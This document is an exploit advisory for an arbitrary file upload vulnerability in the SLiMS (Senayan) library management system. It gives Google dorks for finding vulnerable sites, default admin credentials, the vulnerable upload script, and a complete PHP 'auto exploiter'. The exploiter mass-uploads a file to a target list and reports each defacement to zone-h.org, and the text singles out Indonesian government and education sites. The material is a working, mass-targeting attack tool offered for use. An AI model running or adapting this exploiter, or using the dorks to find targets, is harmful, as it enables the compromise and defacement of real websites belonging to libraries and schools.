Slims CMS Senayan Library Management 7.0 File Upload

########################################################################

# Exploit Title : Slims CMS Senayan Library Management System 7.0 Arbitrary File Upload
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Team
# Date : 13/02/2019
# Vendor Homepage : slims.web.id
# Software Download Link : github.com/slims/
github.com/slims/slims8_akasia/archive/master.zip
github.com/slims/slims7_cendana/archive/master.zip
github.com/slims/s3st15_matoa/archive/master.zip
github.com/slims/slims5_meranti/archive/master.zip
github.com/slims/s3st14/archive/master.zip
# Software Information Link : slims.web.id/web/ * slims.web.id/goslims/
# Software Affected Version : 5/6/7 and previous versions
# Tested on : Windows / Linux
# Exploit Risk : High
# CXSecurity Exploit Reference Link : cxsecurity.com/ascii/WLB-2018050260

########################################################################

Slims CMS Senayan OpenSource Library Management System
The Winner in the Category of OSS Indonesia ICT Award 2009
Arbitrary File Upload Vulnerability and Auto Exploiter

########################################################################

# Description About Software :
****************************

Description : SLiMS (Senayan Library Management System) is a free and open source Library Management System. It is build on free and
open source technology like PHP and MySQL. SLiMS provides many features such as bibliography database,
circulation, membership management and many more that will help "automating" library tasks.

Features : Online Public Access Catalog (OPAC) with thumbnail document image support (can be use for book cover), Simple Search
and Advanced Search mode  Digital contents/files (PDF, DOC, RTF, XLS, PPT, Video, Audio, etc.)
attachment in each bibliographic record support Documents record detail in MODS (Metadata Object Description Schema)
XML format  RSS (Really Simple Syndication) XML format for OPAC - OAI-PMH (Open Archives Initiative Protocol for Metadata Harvesting)
in Dublin Core format for metadata harvesting purpose - Bibliographic/catalog database management with book cover image support
Serial publication control - Document items (book copies) management with barcode support -
Master Files management to manages document referential data such - as GMD, Collection Types, Publishers, Authors, Locations, Authors and Suppliers
Circulation support with following sub-features :  Loan and Return transaction - Collections reservation
Quick return - Configurable and flexible Loan Rules - Membership management - Stock Taking module to help Stock Op name process in library
Reporting and Statistics - System modules with following sub-features : - Global system configuration - Modules management
Application Users and Groups management - Holiday settings - Barcodes generator utility - Database backup utility
Responsive user interface - 3rd party bibliographic records indexing support with Sphinx Search and MongoDB

########################################################################

#Google Dork 1 :  intext:''The Winner in the Category of OSS Indonesia ICT Award 2009''

#Google Dork 2 : inurl:''index.php?p=show_detail&id='' site:id

#Google Dork 3 : inurl:''/slims5-meranti/'' site:id

#Google Dork 4 : intext:This software and this template are released Under GNU GPL License Version 3. The Winner in the Category of OSS Indonesia ICT Award 2009''

#Google Dork 5 : Powered by SLiMS site:id

#Google Dork 6 : Powered by SLiMS | Design by Indra Sutriadi Pipii

#Google Dork 7 : Beranda Depan · Info Perpustakaan · Area Anggota · Pustakawan · Bantuan Pencarian · MASUK Pustakawan.

#Google Dork 8 : Akses Katalog Publik Daring - Gunakan fasilitas pencarian untuk mempercepat penemuan data katalog.

#Google Dork 9 :  SLiMS (Senayan Library Management System) is an open source Library Management System.
                           It is build on Open source technology like PHP and MySQL.

#Google Dork 10 : PERPUSTAKAAN - Web Online Public Access Catalog - Use the search options to find documents quickly
This software and this template are released Under GNU GPL License Version 3

#Google Dork 11 : inurl:''/index.php?select_lang='' site:sch.id

#Google Dork 12 : Web Online Public Access Catalog - Gunakan fasilitas pencarian untuk mempercepat anda menemukan data katalog

#Google Dork 13 : Welcome To Senayan Library's Online Public Access Catalog (OPAC). Use OPAC to search collection in our library.

#Google Dork 14 : O.P.A.C. (On-line Public Access Catalogue)

#Google Dork 15 : inurl:''/perpustakaan/repository/'' site:id

#Google Dork 16 : Senayan | Open Source Library Management System :: OPAC

########################################################################

Demo Version : softaculous.com/softaculous/demos/SLiMS

Admin Username: admin
Admin Password: pass

########################################################################

# Vulnerable Source Code :
*************************
<?php
/**
 * Copyright (C) 2007,2008  Arie Nugraha ([email protected])
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 3 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
 *
 */
/* Biblio file Adding Pop Windows */
// key to authenticate
define('INDEX_AUTH', '1');
// key to get full database access
define('DB_ACCESS', 'fa');
// main system configuration
require '../../../sysconfig.inc.php';
// IP based access limitation
require LIB_DIR.'ip_based_access.inc.php';
do_checkIP('smc');
do_checkIP('smc-bibliography');
// start the session
require SENAYAN_BASE_DIR.'admin/default/session.inc.php';
require SENAYAN_BASE_DIR.'admin/default/session_check.inc.php';
require SIMBIO_BASE_DIR.'simbio_GUI/table/simbio_table.inc.php';
require SIMBIO_BASE_DIR.'simbio_GUI/form_maker/simbio_form_table.inc.php';
require SIMBIO_BASE_DIR.'simbio_DB/simbio_dbop.inc.php';
require SIMBIO_BASE_DIR.'simbio_FILE/simbio_file_upload.inc.php';
require SIMBIO_BASE_DIR.'simbio_FILE/simbio_directory.inc.php';
// privileges checking
$can_write = utility::havePrivilege('bibliography', 'w');
if (!$can_write) {
  die('<div class="errorBox">'.__('You are not authorized to view this section').'</div>');
}
// page title
$page_title = 'File Attachment Upload';
// check for biblio ID in url
$biblioID = 0;
if (isset($_GET['biblioID']) AND $_GET['biblioID']) {
  $biblioID = (integer)$_GET['biblioID'];
}
// check for file ID in url
$fileID = 0;
if (isset($_GET['fileID']) AND $_GET['fileID']) {
  $fileID = (integer)$_GET['fileID'];
}
// start the output buffer
ob_start();
/* main content */
// biblio topic save proccess
if (isset($_POST['upload']) AND trim(strip_tags($_POST['fileTitle'])) != '') {
  $uploaded_file_id = 0;
  $title = trim(strip_tags($_POST['fileTitle']));
  $url = trim(strip_tags($_POST['fileURL']));
  // create new sql op object
  $sql_op = new simbio_dbop($dbs);
  // FILE UPLOADING
  if (isset($_FILES['file2attach']) AND $_FILES['file2attach']['size']) {
    // create upload object
    $file_dir = trim($_POST['fileDir']);
    $file_upload = new simbio_file_upload();
    $file_upload->setAllowableFormat($sysconf['allowed_file_att']);
    $file_upload->setMaxSize($sysconf['max_upload']*1024);
    $file_upload->setUploadDir(REPO_BASE_DIR.DIRECTORY_SEPARATOR.str_replace('/', DIRECTORY_SEPARATOR, $file_dir));
    $file_upload_status = $file_upload->doUpload('file2attach');
    if ($file_upload_status === UPLOAD_SUCCESS) {
        $file_ext = substr($file_upload->new_filename, strrpos($file_upload->new_filename, '.')+1);
        $fdata['uploader_id'] = $_SESSION['uid'];
        $fdata['file_title'] = $dbs->escape_string($title);
        $fdata['file_name'] = $dbs->escape_string($file_upload->new_filename);
        $fdata['file_url'] = $dbs->escape_string($url);
        $fdata['file_dir'] = $dbs->escape_string($file_dir);
        $fdata['file_desc'] = $dbs->escape_string(trim(strip_tags($_POST['fileDesc'])));
        $fdata['mime_type'] = $sysconf['mimetype'][$file_ext];
        $fdata['input_date'] = date('Y-m-d H:i:s');
        $fdata['last_update'] = $fdata['input_date'];
        // insert file data to database
        @$sql_op->insert('files', $fdata);
        $uploaded_file_id = $sql_op->insert_id;
        utility::writeLogs($dbs, 'staff', $_SESSION['uid'], 'bibliography', $_SESSION['realname'].' upload file ('.$file_upload->new_filename.')');
    } else {
      echo '<script type="text/javascript">';
      echo 'alert(\''.__('Upload FAILED! Forbidden file type or file size too big!').'\');';
      echo 'self.close();';
      echo '</script>';
      die();
    }
  } else {
    if ($url && preg_match('@^(http|https|ftp|gopher):\/\/@i', $url)) {
      $fdata['uploader_id'] = $_SESSION['uid'];
      $fdata['file_title'] = $dbs->escape_string($title);
      $fdata['file_name'] = $dbs->escape_string($url);
      $fdata['file_url'] = $dbs->escape_string($fdata['file_name']);
      $fdata['file_dir'] = 'literal{NULL}';
      $fdata['file_desc'] = $dbs->escape_string(trim(strip_tags($_POST['fileDesc'])));
      $fdata['mime_type'] = 'text/uri-list';
      $fdata['input_date'] = date('Y-m-d H:i:s');
      $fdata['last_update'] = $fdata['input_date'];
      // insert file data to database
      @$sql_op->insert('files', $fdata);
      $uploaded_file_id = $sql_op->insert_id;
    }
  }
  // BIBLIO FILE RELATION DATA UPDATE
  // check if biblio_id POST var exists
  if (isset($_POST['updateBiblioID']) AND !empty($_POST['updateBiblioID'])) {
    $updateBiblioID = (integer)$_POST['updateBiblioID'];
    $data['biblio_id'] = $updateBiblioID;
    $data['file_id'] = $uploaded_file_id;
    $data['access_type'] = trim($_POST['accessType']);
    $data['access_limit'] = 'literal{NULL}';
    // parsing member type data
    if ($data['access_type'] == 'public') {
      $groups = '';
      if (isset($_POST['accLimit']) AND count($_POST['accLimit']) > 0) {
        $groups = serialize($_POST['accLimit']);
      } else {
        $groups = 'literal{NULL}';
      }
      $data['access_limit'] = trim($groups);
    }
    if (isset($_POST['updateFileID'])) {
      $fileID = (integer)$_POST['updateFileID'];
      // file biblio access update
      $update1 = $sql_op->update('biblio_attachment', array('access_type' => $data['access_type'], 'access_limit' => $data['access_limit']), 'biblio_id='.$updateBiblioID.' AND file_id='.$fileID);
      // file description update
      $update2 = $sql_op->update('files', array('file_title' => $title, 'file_url' => $url, 'file_desc' => $dbs->escape_string(trim($_POST['fileDesc']))), 'file_id='.$fileID);
      if ($update1) {
        echo '<script type="text/javascript">';
        echo 'alert(\''.__('File Attachment data updated!').'\');';
        echo 'parent.setIframeContent(\'attachIframe\', \''.MODULES_WEB_ROOT_DIR.'bibliography/iframe_attach.php?biblioID='.$updateBiblioID.'\');';
        echo '</script>';
      } else {
          utility::jsAlert(''.__('File Attachment data FAILED to update!').''."\n".$sql_op->error);
      }
    } else {
      if ($sql_op->insert('biblio_attachment', $data)) {
        echo '<script type="text/javascript">';
        echo 'alert(\''.__('File Attachment uploaded succesfully!').'\');';
        echo 'parent.setIframeContent(\'attachIframe\', \''.MODULES_WEB_ROOT_DIR.'bibliography/iframe_attach.php?biblioID='.$data['biblio_id'].'\');';
        echo '</script>';
      } else {
        utility::jsAlert(''.__('File Attachment data FAILED to save!').''."\n".$sql_op->error);
      }
    }
    utility::writeLogs($dbs, 'staff', $_SESSION['uid'], 'bibliography', $_SESSION['realname'].' updating file attachment data');
  } else {
    if ($uploaded_file_id) {
      // add to session array
      $fdata['file_id'] = $uploaded_file_id;
      $fdata['access_type'] = trim($_POST['accessType']);
      $_SESSION['biblioAttach'][$uploaded_file_id] = $fdata;
      echo '<script type="text/javascript">';
      echo 'alert(\''.__('File Attachment uploaded succesfully!').'\');';
      echo 'parent.setIframeContent(\'attachIframe\', \''.MODULES_WEB_ROOT_DIR.'bibliography/iframe_attach.php\');';
      echo '</script>';
    }
  }
}
// create new instance
$form = new simbio_form_table('mainForm', $_SERVER['PHP_SELF'].'?biblioID='.$biblioID, 'post');
$form->submit_button_attr = 'name="upload" value="'.__('Upload Now').'" class="button"';
// form table attributes
$form->table_attr = 'align="center" id="dataList" cellpadding="5" cellspacing="0"';
$form->table_header_attr = 'class="alterCell" style="font-weight: bold;"';
$form->table_content_attr = 'class="alterCell2"';
// query
$file_attach_q = $dbs->query("SELECT fl.*, batt.* FROM files AS fl
  LEFT JOIN biblio_attachment AS batt ON fl.file_id=batt.file_id
  WHERE batt.biblio_id=$biblioID AND batt.file_id=$fileID");
$file_attach_d = $file_attach_q->fetch_assoc();
// edit mode
if ($file_attach_d['biblio_id'] AND $file_attach_d['file_id']) {
  $form->addHidden('updateBiblioID', $file_attach_d['biblio_id']);
  $form->addHidden('updateFileID', $file_attach_d['file_id']);
} else if ($biblioID) {
  $form->addHidden('updateBiblioID', $biblioID);
}
// file title
$form->addTextField('text', 'fileTitle', __('Title').'*', $file_attach_d['file_title'], 'style="width: 95%; overflow: auto;"');
// file attachment
if ($file_attach_d['file_name']) {
  $form->addAnything('Attachment', $file_attach_d['file_dir'].'/'.$file_attach_d['file_name']);
} else {
  // file upload dir
  // create simbio directory object
  $repo = new simbio_directory(REPO_BASE_DIR);
  $repo_dir_tree = $repo->getDirectoryTree(5);
  $repodir_options[] = array('', __('Repository ROOT'));
  if (is_array($repo_dir_tree)) {
    // sort array by index
    ksort($repo_dir_tree);
    // loop array
    foreach ($repo_dir_tree as $dir) {
      $repodir_options[] = array($dir, $dir);
    }
  }
  // add repo directory options to select list
  $form->addSelectList('fileDir', __('Repo. Directory'), $repodir_options);
  // file upload
  $str_input = simbio_form_element::textField('file', 'file2attach');
  $str_input .= ' Maximum '.$sysconf['max_upload'].' KB';
  $form->addAnything(__('File To Attach'), $str_input);
}
// file url
$form->addTextField('textarea', 'fileURL', __('URL'), $file_attach_d['file_url'], 'rows="1" style="width: 100%; overflow: auto;"');
// file description
$form->addTextField('textarea', 'fileDesc', __('Description'), $file_attach_d['file_desc'], 'rows="2" style="width: 100%; overflow: auto;"');
// file access
$acctype_options[] = array('public', __('Public'));
$acctype_options[] = array('private', __('Private'));
$form->addSelectList('accessType', __('Access'), $acctype_options, $file_attach_d['access_type']);
// file access limit if set to public
$group_query = $dbs->query('SELECT member_type_id, member_type_name FROM mst_member_type');
$group_options = array();
while ($group_data = $group_query->fetch_row()) {
  $group_options[] = array($group_data[0], $group_data[1]);
}
$form->addCheckBox('accLimit', __('Access Limit by Member Type'), $group_options, !empty($file_attach_d['access_limit'])?unserialize($file_attach_d['access_limit']):null );
// print out the object
echo $form->printOut();
/* main content end */
$content = ob_get_clean();
// include the page template
require SENAYAN_BASE_DIR.'/admin/'.$sysconf['admin_template']['dir'].'/notemplate_page_tpl.php';

########################################################################

# Exploit Code :
***************
/admin/modules/bibliography/pop_attach.php

Note : You can use Auto Exploiter PHP Code.

# Directory File Path :
*********************
/repository/....

# Note : Fill the form and choose your file and upload it.

# Allowed File Extensions : txt jpg gif png

#Indonesian Government / Education Sites are vulnerable for this issue.

#Attackers can exploit this issue via a browser or with Auto PHP Exploiter tool.

########################################################################

#Auto Exploiter PHP Code =>
******************************

<?php
/*
# KingSkrupellos from Cyberizm Digital Security Team
# Our Security Forum : cyberizm.org
# Twitter : twitter.com/kngskrplls

# your list.txt must a single directory with this exploiter #

###############################################

# This Exploit and Vulnerability was discovered by KingSkrupellos
# Thanks for All Moslem Hackers and Cyberizm Digital Security Team
# This Exploiter may sometimes couldn't work %100 because sometimes the bot don't understand the command.
#  If the command don't understand the command, please exploit it manually.

# Special thanks : All Moslem Hackers and Cyberizm Digital Security Team

#################################################
# note : Please do not remove Cyberizm copyright.


# This Exploit Coded By KingSkrupellos from Cyberizm Digital Security Team
*/
echo "

      File Attachment Auto Exploiter - coded by KingSkrupellos

     $ Thanks for All Moslem Hackers and Cyberizm Digital Security Team

";
echo "Input your target list: ";
$list = trim(fgets(STDIN));

$shell = "yourdefacefilename.txt";
$nickzoneh = "KingSkrupellos";
$exploit = "/admin/modules/bibliography/pop_attach.php";
$path = "/repository/";

$open = fopen("$list","r");
$size = filesize("$list");
$read = fread($open,$size);
$lists = explode("\r\n",$read);

echo "\n";

foreach($lists as $target){
    if(!preg_match("/^http:\/\//",$target) AND !preg_match("/^https:\/\//",$target)){
        $targets = "http://$target";
    }else{
        $targets = $target;
    }

    echo "Target => $targets\n";
    echo "  [*] Checking Path : ";

    $cd = curl_init("$targets$exploit");
    curl_setopt($cd, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($cd, CURLOPT_RETURNTRANSFER, 1);
    curl_exec($cd);
    $httpcode = curl_getinfo($cd, CURLINFO_HTTP_CODE);
    curl_close($cd);

    if($httpcode == 200){
        echo "200 OK\n";
        echo "  [*] Uploading shell : ";
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, "$targets/$exploit");
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, array("fileTitle"=>"CyBeRiZM" , "file2attach"=>"@$shell" , "upload"=>"Unggah Sekarang"));
        curl_exec($ch);

        $cek = curl_init();
        curl_setopt($cek, CURLOPT_URL, "$targets$path$shell");
        curl_setopt($cek, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($cek, CURLOPT_RETURNTRANSFER, 1);
        $ceek = curl_exec($cek);
        $ceeks = curl_getinfo($cek, CURLINFO_HTTP_CODE);

        if(preg_match("/hacked/",$ceek) or $ceeks == 200){
            echo "OK $targets$path$shell\n";
            echo "  [*] Zone-H : ";
            $zh = curl_init("http://zone-h.org/notify/single");
            curl_setopt($zh, CURLOPT_FOLLOWLOCATION, 1);
            curl_setopt($zh, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($zh, CURLOPT_POST, 1);
            curl_setopt($zh, CURLOPT_POSTFIELDS, array("defacer"=>"$nickzoneh","domain1"=>"$targets$path$shell","hackmode"=>"18","reason"=>"5"));

            $postzh = curl_exec($zh);
            if(preg_match("/color=\"red\">OK<\/font><\/li>/i",$postzh)){
                echo "OK\n\n";
            }else{
                echo "NO\n\n";
            }
        }else{
            echo "Failed\n\n";
        }
    }else{
        echo "Not Vulnerable\n\n";
    }
}

##############################################################################################################

# Discovered By Hacker KingSkrupellos from Cyberizm Digital Security Technological Turkish Moslem Army

##############################################################################################################